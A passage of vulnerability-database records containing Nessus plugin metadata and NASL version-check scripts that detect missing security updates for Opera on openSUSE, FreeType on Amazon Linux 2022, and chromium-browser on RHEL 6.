LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143001);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16000\",\n \"CVE-2020-16001\",\n \"CVE-2020-16002\",\n \"CVE-2020-16003\",\n \"CVE-2020-16004\",\n \"CVE-2020-16005\",\n \"CVE-2020-16006\",\n \"CVE-2020-16007\",\n \"CVE-2020-16008\",\n \"CVE-2020-16009\",\n \"CVE-2020-16011\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-2020-1952)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for opera fixes the following issues :\n\nOpera was updated to version 72.0.3815.320\n\n - CHR-8177 Update chromium on desktop-stable-86-3815 to\n 86.0.4240.183\n\n - DNA-89748 ‘Manage Extensions’ dialog is\n displayed with preloaded extensions\n\n - DNA-89766 Address bar does not respond to actions\n\n - The update to chromium 86.0.4240.183 fixes following\n issues: CVE-2020-16004, CVE-2020-16005, CVE-2020-16006,\n CVE-2020-16007, CVE-2020-16008, CVE-2020-16009,\n CVE-2020-16011\n\n - Update to version 72.0.3815.200\n\n - DNA-87150 Speed Dial tile can’t be dragged to\n proper place\n\n - DNA-89632 Improve hovering over icons\n\n - DNA-89647 [Light mode] Wrong URL color in ‘Add\n Site’ section\n\n - DNA-89791 Typo in Spanish\n\n - The update to chromium 86.0.4240.111 fixes following\n issues: CVE-2020-16000, CVE-2020-16001, CVE-2020-16002,\n CVE-2020-15999, CVE-2020-16003\n\n - Complete Opera 72.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-72/\n\n - Update to version 71.0.3770.271\n\n - DNA-88353 Crash at\n opera::TabCyclerView::HighlightContents\n (content::WebContents*, bool)\n\n - DNA-89177 Device update request should only be called\n when FCM token has changed\n\n - DNA-89186 Handle device expired case in all server calls\n\n - DNA-89202 Pages are rendered in dark mode when force\n dark mode prefs were synced from Opera GX\n\n - DNA-89247 [Mac] Fullscreen video broken if sidebar is\n hidden\n\n - DNA-89298 Some elements of VPN popup are misaligned to\n design\n\n - DNA-89305 Crash after closing Downloads pop-up\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.opera.com/desktop/changelog-for-72/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16011\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1|SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1 / 15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"opera-72.0.3815.320-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"opera-72.0.3815.320-lp152.2.21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T17:06:17", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-154 advisory.\n\n - FreeType commit 1e2eb65048f75c64b68708efed6ce904c31f3b2f was discovered to contain a heap buffer overflow via the function sfnt_init_face. (CVE-2022-27404)\n\n - FreeType commit 53dfdcd8198d2b3201a23c4bad9190519ba918db was discovered to contain a segmentation violation via the function FNT_Size_Request. (CVE-2022-27405)\n\n - FreeType commit 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 was discovered to contain a segmentation violation via the function FT_Request_Size. (CVE-2022-27406)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-20T00:00:00", "type": "nessus", "title": "Amazon Linux 2022 : (ALAS2022-2022-154)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15999", "CVE-2022-27404", "CVE-2022-27405", "CVE-2022-27406"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:freetype", "p-cpe:/a:amazon:linux:freetype-debuginfo", "p-cpe:/a:amazon:linux:freetype-debugsource", "p-cpe:/a:amazon:linux:freetype-demos", "p-cpe:/a:amazon:linux:freetype-demos-debuginfo", "p-cpe:/a:amazon:linux:freetype-devel", "cpe:/o:amazon:linux:2022"], "id": "AL2022_ALAS2022-2022-154.NASL", "href": "https://www.tenable.com/plugins/nessus/166354", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2022 Security Advisory ALAS2022-2022-154.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166354);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2022-27404\",\n \"CVE-2022-27405\",\n \"CVE-2022-27406\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Amazon Linux 2022 : (ALAS2022-2022-154)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2022 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-154 advisory.\n\n - FreeType commit 1e2eb65048f75c64b68708efed6ce904c31f3b2f was discovered to contain a heap buffer overflow\n via the function sfnt_init_face. (CVE-2022-27404)\n\n - FreeType commit 53dfdcd8198d2b3201a23c4bad9190519ba918db was discovered to contain a segmentation\n violation via the function FNT_Size_Request. (CVE-2022-27405)\n\n - FreeType commit 22a0cccb4d9d002f33c1ba7a4b36812c7d4f46b5 was discovered to contain a segmentation\n violation via the function FT_Request_Size. (CVE-2022-27406)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2022/ALAS-2022-154.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-27404.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-27405.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-27406.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update freetype --releasever=2022.0.20221019' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-27404\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype-demos-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:freetype-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2022\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"-2022\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2022\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'freetype-2.11.0-6.amzn2022.0.1', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-2.11.0-6.amzn2022.0.1', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-2.11.0-6.amzn2022.0.1', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-debuginfo-2.11.0-6.amzn2022.0.1', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-debuginfo-2.11.0-6.amzn2022.0.1', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-debuginfo-2.11.0-6.amzn2022.0.1', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-debugsource-2.11.0-6.amzn2022.0.1', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-debugsource-2.11.0-6.amzn2022.0.1', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-debugsource-2.11.0-6.amzn2022.0.1', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-demos-2.11.0-6.amzn2022.0.1', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-demos-2.11.0-6.amzn2022.0.1', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-demos-2.11.0-6.amzn2022.0.1', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-demos-debuginfo-2.11.0-6.amzn2022.0.1', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-demos-debuginfo-2.11.0-6.amzn2022.0.1', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-demos-debuginfo-2.11.0-6.amzn2022.0.1', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-devel-2.11.0-6.amzn2022.0.1', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-devel-2.11.0-6.amzn2022.0.1', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'freetype-devel-2.11.0-6.amzn2022.0.1', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype / freetype-debuginfo / freetype-debugsource / etc\");\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T15:02:27", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:4974 advisory.\n\n - chromium-browser: Use after free in user interface (CVE-2020-16004)\n\n - chromium-browser: Insufficient policy enforcement in ANGLE (CVE-2020-16005)\n\n - chromium-browser: Inappropriate implementation in V8 (CVE-2020-16006, CVE-2020-16009)\n\n - chromium-browser: Stack buffer overflow in WebRTC (CVE-2020-16008)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-09T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2020:4974)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16006", "CVE-2020-16008", "CVE-2020-16009"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:rhel_eus:6.0", "p-cpe:/a:redhat:enterprise_linux:chromium-browser"], "id": "REDHAT-RHSA-2020-4974.NASL", "href": "https://www.tenable.com/plugins/nessus/142643", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4974. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142643);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-16004\",\n \"CVE-2020-16005\",\n \"CVE-2020-16006\",\n \"CVE-2020-16008\",\n \"CVE-2020-16009\"\n );\n script_xref(name:\"RHSA\", value:\"2020:4974\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2020:4974)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:4974 advisory.\n\n - chromium-browser: Use after free in user interface (CVE-2020-16004)\n\n - chromium-browser: Insufficient policy enforcement in ANGLE (CVE-2020-16005)\n\n - chromium-browser: Inappropriate implementation in V8 (CVE-2020-16006, CVE-2020-16009)\n\n - chromium-browser: Stack buffer overflow in WebRTC (CVE-2020-16008)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16005\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16006\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16008\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-16009\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4974\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894197\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894198\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894199\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894201\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1894202\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16009\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'enterprise_linux_6_client': [\n 'rhel-6-desktop-debug-rpms',\n 'rhel-6-desktop-fastrack-debug-rpms',\n 'rhel-6-desktop-fastrack-rpms',\n 'rhel-6-desktop-fastrack-source-rpms',\n 'rhel-6-desktop-optional-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-rpms',\n 'rhel-6-desktop-optional-fastrack-source-rpms',\n 'rhel-6-desktop-optional-rpms',\n 'rhel-6-desktop-optional-source-rpms',\n 'rhel-6-desktop-rpms',\n 'rhel-6-desktop-source-rpms'\n ],\n 'enterprise_linux_6_computenode': [\n 'rhel-6-for-hpc-node-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-fastrack-rpms',\n 'rhel-6-for-hpc-node-fastrack-source-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-source-rpms',\n 'rhel-6-hpc-node-debug-rpms',\n 'rhel-6-hpc-node-optional-debug-rpms',\n 'rhel-6-hpc-node-optional-rpms',\n 'rhel-6-hpc-node-optional-source-rpms',\n 'rhel-6-hpc-node-rpms',\n 'rhel-6-hpc-node-source-rpms',\n 'rhel-hpc-node-6-eus-sfs-debug-rpms',\n 'rhel-hpc-node-6-eus-sfs-source-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-debug-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-source-rpms'\n ],\n 'enterprise_linux_6_server': [\n 'rhel-6-server-debug-rpms',\n 'rhel-6-server-fastrack-debug-rpms',\n 'rhel-6-server-fastrack-rpms',\n 'rhel-6-server-fastrack-source-rpms',\n 'rhel-6-server-optional-debug-rpms',\n 'rhel-6-server-optional-fastrack-debug-rpms',\n 'rhel-6-server-optional-fastrack-rpms',\n 'rhel-6-server-optional-fastrack-source-rpms',\n 'rhel-6-server-optional-rpms',\n 'rhel-6-server-optional-source-rpms',\n 'rhel-6-server-rpms',\n 'rhel-6-server-source-rpms',\n 'rhel-ha-for-rhel-6-server-debug-rpms',\n 'rhel-ha-for-rhel-6-server-rpms',\n 'rhel-ha-for-rhel-6-server-source-rpms',\n 'rhel-lb-for-rhel-6-server-debug-rpms',\n 'rhel-lb-for-rhel-6-server-rpms',\n 'rhel-lb-for-rhel-6-server-source-rpms',\n 'rhel-rs-for-rhel-6-server-debug-rpms',\n 'rhel-rs-for-rhel-6-server-rpms',\n 'rhel-rs-for-rhel-6-server-source-rpms',\n 'rhel-scalefs-for-rhel-6-server-debug-rpms',\n 'rhel-scalefs-for-rhel-6-server-rpms',\n 'rhel-scalefs-for-rhel-6-server-source-rpms'\n ],\n 'enterprise_linux_6_workstation': [\n 'rhel-6-workstation-debug-rpms',\n 'rhel-6-workstation-fastrack-debug-rpms',\n 'rhel-6-workstation-fastrack-rpms',\n 'rhel-6-workstation-fastrack-source-rpms',\n 'rhel-6-workstation-optional-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-rpms',\n 'rhel-6-workstation-optional-fastrack-source-rpms',\n 'rhel-6-workstation-optional-rpms',\n 'rhel-6-workstation-optional-source-rpms',\n 'rhel-6-workstation-rpms',\n 'rhel-6-workstation-source-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-debug-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-source-rpms'\n ],\n 'rhel_extras_6': [\n 'rhel-6-desktop-supplementary-debuginfo',\n 'rhel-6-desktop-supplementary-rpms',\n 'rhel-6-desktop-supplementary-source-rpms',\n 'rhel-6-for-hpc-node-supplementary-debuginfo',\n 'rhel-6-for-hpc-node-supplementary-rpms',\n 'rhel-6-for-hpc-node-supplementary-source-rpms',\n 'rhel-6-server-aus-supplementary-debuginfo',\n 'rhel-6-server-aus-supplementary-rpms',\n 'rhel-6-server-aus-supplementary-source-rpms',\n 'rhel-6-server-eus-supplementary-debuginfo',\n 'rhel-6-server-eus-supplementary-rpms',\n 'rhel-6-server-eus-supplementary-source-rpms',\n 'rhel-6-server-supplementary-debuginfo',\n 'rhel-6-server-supplementary-rpms',\n 'rhel-6-server-supplementary-source-rpms',\n 'rhel-6-workstation-supplementary-debuginfo',\n 'rhel-6-workstation-supplementary-rpms',\n 'rhel-6-workstation-supplementary-source-rpms',\n 'rhel-hpc-node-6-eus-supplementary-debug-rpms',\n 'rhel-hpc-node-6-eus-supplementary-rpms',\n 'rhel-hpc-node-6-eus-supplementary-source-rpms'\n ],\n 'rhel_extras_hpn_6': [\n 'rhel-hpn-for-rhel-6-hpc-node-rpms',\n 'rhel-hpn-for-rhel-6-server-rpms'\n ],\n 